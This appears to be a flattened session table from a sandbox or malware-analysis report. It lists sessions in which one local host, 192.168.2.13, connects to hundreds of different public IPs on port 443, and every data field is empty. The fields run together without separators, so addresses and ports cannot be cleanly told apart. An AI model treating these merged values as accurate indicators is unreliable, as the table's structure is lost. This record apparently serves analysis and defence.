                                                24158192.168.2.1340074157.14.191.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24159192.168.2.133416095.152.79.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24160192.168.2.135297284.14.65.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24161192.168.2.1335232163.73.139.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24162192.168.2.1333824154.238.252.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24163192.168.2.13343769.106.5.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24164192.168.2.1360996130.131.121.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24165192.168.2.134989094.113.221.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24166192.168.2.134024875.122.199.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24167192.168.2.135212827.33.48.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24168192.168.2.1352752129.97.61.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24169192.168.2.1333422192.249.81.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24170192.168.2.1338560183.163.208.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24171192.168.2.135827053.133.240.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24172192.168.2.1359700206.3.48.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24173192.168.2.1357952143.53.117.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24174192.168.2.133385223.12.8.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24175192.168.2.1352746163.187.159.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24176192.168.2.135617663.253.12.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24177192.168.2.1351994111.186.214.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24178192.168.2.1334358202.207.220.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24179192.168.2.1338464121.78.140.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24180192.168.2.1345482216.64.108.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24181192.168.2.1342624181.200.242.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24182192.168.2.135427872.6.127.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24183192.168.2.135003239.80.104.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24184192.168.2.1355672155.178.187.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24185192.168.2.134275097.46.76.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24186192.168.2.1343586117.215.156.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24187192.168.2.13575325.185.138.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24188192.168.2.1342128139.165.128.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24189192.168.2.1345222166.212.85.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24190192.168.2.13344289.145.77.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24191192.168.2.1332864104.57.198.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192192.168.2.13604924.190.179.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24193192.168.2.1336256139.249.254.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24194192.168.2.1346706187.82.96.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24195192.168.2.1340440107.107.238.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24196192.168.2.1358814103.29.244.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24197192.168.2.135706657.58.224.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24198192.168.2.1359752173.88.117.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24199192.168.2.1341270173.243.86.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24200192.168.2.1346886218.171.149.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24201192.168.2.1333366146.109.150.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24202192.168.2.1352712170.162.183.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24203192.168.2.1337368139.101.57.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24204192.168.2.1346102144.53.142.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24205192.168.2.134840466.209.133.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24206192.168.2.135519866.192.138.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24207192.168.2.133713066.216.46.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24208192.168.2.1356192169.112.111.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24209192.168.2.1337336129.19.121.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24210192.168.2.1356776101.105.207.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24211192.168.2.135490479.39.192.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24212192.168.2.1360470143.252.159.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24213192.168.2.134164650.12.182.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24214192.168.2.1336340128.37.179.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24215192.168.2.136011292.232.53.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24216192.168.2.1356530115.18.31.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24217192.168.2.135356452.161.136.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24218192.168.2.135035627.8.137.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24219192.168.2.1351532156.193.218.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24220192.168.2.134110860.214.82.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24221192.168.2.1337752131.217.101.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24222192.168.2.134719264.170.16.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24223192.168.2.1357524152.255.185.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24224192.168.2.1356784202.33.54.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24225192.168.2.1346466179.164.105.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24226192.168.2.135086692.196.164.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24227192.168.2.134345620.0.155.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24228192.168.2.1349188125.210.219.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24229192.168.2.134078836.157.38.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24230192.168.2.1353012122.133.5.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24231192.168.2.1336704150.95.189.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24232192.168.2.1336418108.70.73.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24233192.168.2.134486678.70.8.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24234192.168.2.1345250125.171.226.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24235192.168.2.136060851.153.163.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24236192.168.2.135712676.63.72.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24237192.168.2.1350506182.117.126.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24238192.168.2.1355108144.236.79.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24239192.168.2.1353330184.172.250.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24240192.168.2.1334946185.157.240.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24241192.168.2.13498185.143.119.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24242192.168.2.1339272146.230.170.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24243192.168.2.134395257.141.52.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24244192.168.2.1339064133.160.199.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24245192.168.2.1336676193.233.209.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24246192.168.2.135312452.253.175.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24247192.168.2.134139817.241.105.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24248192.168.2.1352238199.31.153.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24249192.168.2.1341044187.27.124.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24250192.168.2.1357542139.153.39.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24251192.168.2.1350394126.124.243.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24252192.168.2.136094680.121.137.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24253192.168.2.135207288.147.5.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24254192.168.2.1350296196.12.32.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24255192.168.2.1344184172.217.24.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24256192.168.2.1340726199.124.154.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24257192.168.2.1355324192.239.96.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24258192.168.2.135888868.175.43.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24259192.168.2.1336544152.122.109.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24260192.168.2.135220417.217.30.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24261192.168.2.136094031.7.37.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24262192.168.2.135006051.161.203.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24263192.168.2.135750668.82.208.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24264192.168.2.1356332170.76.68.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24265192.168.2.1337056147.42.93.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24266192.168.2.1352134120.20.24.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24267192.168.2.1360416167.5.232.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24268192.168.2.1338240147.227.39.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24269192.168.2.1351916185.233.125.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24270192.168.2.1338326151.219.170.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24271192.168.2.135538667.170.209.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24272192.168.2.1351150198.37.170.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24273192.168.2.135147875.233.22.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24274192.168.2.135642093.10.84.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24275192.168.2.1360854157.143.170.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24276192.168.2.1335028123.5.116.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24277192.168.2.1356420170.79.38.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24278192.168.2.1350686213.200.152.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24279192.168.2.1360370178.124.182.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24280192.168.2.1333360133.129.241.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24281192.168.2.1353304178.119.91.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24282192.168.2.135032845.102.149.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24283192.168.2.1334342184.216.237.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24284192.168.2.1346936104.227.251.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24285192.168.2.1351654153.75.163.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24286192.168.2.1344374118.174.210.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24287192.168.2.1360356149.203.40.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24288192.168.2.1338700185.137.145.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24289192.168.2.134093431.144.110.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24290192.168.2.1356268164.55.172.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24291192.168.2.1358880143.198.44.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24292192.168.2.134133267.19.36.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24293192.168.2.13601124.62.126.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24294192.168.2.1341660154.2.125.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24295192.168.2.1343674113.68.253.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24296192.168.2.1347054221.12.70.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24297192.168.2.135837620.166.252.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24298192.168.2.136015870.46.227.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24299192.168.2.1340120221.7.93.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24300192.168.2.135774453.40.103.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24301192.168.2.134131873.249.210.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24302192.168.2.1333744174.57.191.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24303192.168.2.1337744205.26.247.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24304192.168.2.135098880.215.226.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24305192.168.2.1336046166.226.201.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24306192.168.2.1337322157.133.152.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24307192.168.2.1336496121.148.191.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24308192.168.2.135995849.0.146.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24309192.168.2.1358426123.171.176.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24310192.168.2.1356864176.40.75.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24311192.168.2.1335286197.132.9.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24312192.168.2.133310631.111.221.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24313192.168.2.1360340128.247.208.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24314192.168.2.1338348107.251.236.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24315192.168.2.135501482.75.11.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24316192.168.2.1358626154.193.23.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24317192.168.2.1335634196.116.238.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24318192.168.2.1351272209.155.126.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24319192.168.2.134594437.240.219.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24320192.168.2.135257212.244.240.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24321192.168.2.1336300171.20.5.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24322192.168.2.1338666220.245.137.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24323192.168.2.1333546138.180.201.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24324192.168.2.133912827.71.149.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24325192.168.2.1337148188.98.68.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24326192.168.2.134321670.189.168.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24327192.168.2.1345542185.88.29.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24328192.168.2.135567694.205.229.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24329192.168.2.1332904163.118.125.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24330192.168.2.1341130104.239.189.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24331192.168.2.1354226180.6.61.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24332192.168.2.1360842221.53.254.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24333192.168.2.1344130152.97.126.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24334192.168.2.1335834210.83.156.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24335192.168.2.135504077.18.147.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24336192.168.2.134865082.147.13.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24337192.168.2.1356976148.74.89.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24338192.168.2.135783699.202.49.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24339192.168.2.135030276.81.126.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24340192.168.2.1347194134.123.176.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24341192.168.2.1355888124.61.106.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24342192.168.2.134205845.202.213.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24343192.168.2.1351894175.198.76.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24344192.168.2.1341620207.55.113.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24345192.168.2.135751898.183.141.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24346192.168.2.1337220168.117.40.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24347192.168.2.135708083.180.41.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24348192.168.2.134037039.118.166.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24349192.168.2.1353882111.64.15.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24350192.168.2.135900061.9.212.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24351192.168.2.134282065.86.209.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24352192.168.2.1348814166.125.102.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24353192.168.2.1342256140.245.101.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24354192.168.2.1339802118.64.5.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24355192.168.2.1347088204.88.211.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24356192.168.2.1359486183.119.53.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24357192.168.2.1360352105.37.161.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24358192.168.2.135048247.120.46.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24359192.168.2.1351370171.222.111.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24360192.168.2.135628427.238.204.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24361192.168.2.134278479.45.75.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24362192.168.2.13409144.227.81.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24363192.168.2.1352534132.45.247.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24364192.168.2.1347920182.255.149.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24365192.168.2.1357026175.205.48.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24366192.168.2.1345618165.161.230.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24367192.168.2.13404542.192.130.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24368192.168.2.134023244.145.59.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24369192.168.2.1359450183.162.240.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24370192.168.2.1346010183.252.145.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24371192.168.2.1342072126.189.111.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24372192.168.2.1345636170.223.132.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24373192.168.2.133791857.33.47.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24374192.168.2.1334226114.83.128.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24375192.168.2.1345144191.35.134.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24376192.168.2.1358164161.37.2.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24377192.168.2.1334518199.127.138.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24378192.168.2.1335826160.137.205.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24379192.168.2.1333450191.187.207.90443
                                                TimestampBytes transferredDirectionData


